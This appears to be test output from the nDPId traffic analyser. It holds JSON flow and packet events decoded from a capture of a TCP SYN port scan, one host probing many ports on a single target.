+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsbGUAAC4Grg2sEAAIQA2GNIzTOpzdU4MZAAAAAGACDADx7wAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsBk8AACsGFySsEAAIQA2GNIzTACDdU4MZAAAAAGACEAAobAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsNgIAAC8G43CsEAAIQA2GNIzTKYLdU4MZAAAAAGACEAD\/CQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsFUwAACgGCyesEAAIQA2GNIzTBADdU4MZAAAAAGACBAAwjAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsZxkAADgGqVmsEAAIQA2GNIzTFr7dU4MZAAAAAGACBAAdzgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsnUIAACUGhjCsEAAIQA2GNIzTHCDdU4MZAAAAAGACCAAUbAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs0jAAACkGTUKsEAAIQA2GNIzTBKPdU4MZAAAAAGACCAAr6QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsfmUAAC8Gmw2sEAAIQA2GNIzTDAXdU4MZAAAAAGACEAAchwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs9zUAADUGHD2sEAAIQA2GNIzTDvLdU4MZAAAAAGACCAAhmgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsQXsAACUG4fesEAAIQA2GNIzTIGPdU4MZAAAAAGACCAAQKQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs89cAACUGL5usEAAIQA2GNIzSF0fdUoMYAAAAAGACCAAZSAAAAgQFtA=="} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsbN4AADkGopSsEAAIQA2GNIzSAandUoMYAAAAAGACCAAu5gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsGdAAADQG+qKsEAAIQA2GNIzSJRzdUoMYAAAAAGACBAAPcwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsTDsAADYGxjesEAAIQA2GNIzSNrDdUoMYAAAAAGACDAD13gAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ98AACUGu5OsEAAIQA2GNIzSPSzdUoMYAAAAAGACCADzYgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsnPQAADQGd36sEAAIQA2GNIzSNJDdUoMYAAAAAGACBAD\/\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs3OIAACsGQJCsEAAIQA2GNIzSBDHdUoMYAAAAAGACEAAkXgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsg4YAACoGmuysEAAIQA2GNIzSCDrdUoMYAAAAAGACDAAkVQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs28kAACgGRKmsEAAIQA2GNIzS8FzdUoMYAAAAAGACBABEMgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsTfIAADkGwYCsEAAIQA2GNIzSAfHdUoMYAAAAAGACCAAungAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs93kAACUGK\/msEAAIQA2GNIzSCzXdUoMYAAAAAGACCAAlWgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsrdMAACcGc5+sEAAIQA2GNIzSGg3dUoMYAAAAAGACEAAOggAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZcAADMGp9usEAAIQA2GNIzSBZndUoMYAAAAAGACEAAi9gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsF0kAACUGDCqsEAAIQA2GNIzSD6DdUoMYAAAAAGACCAAg7wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsM9YAADEG45ysEAAIQA2GNIzSBBPdUoMYAAAAAGACCAAsfAAAAgQFtA=="} 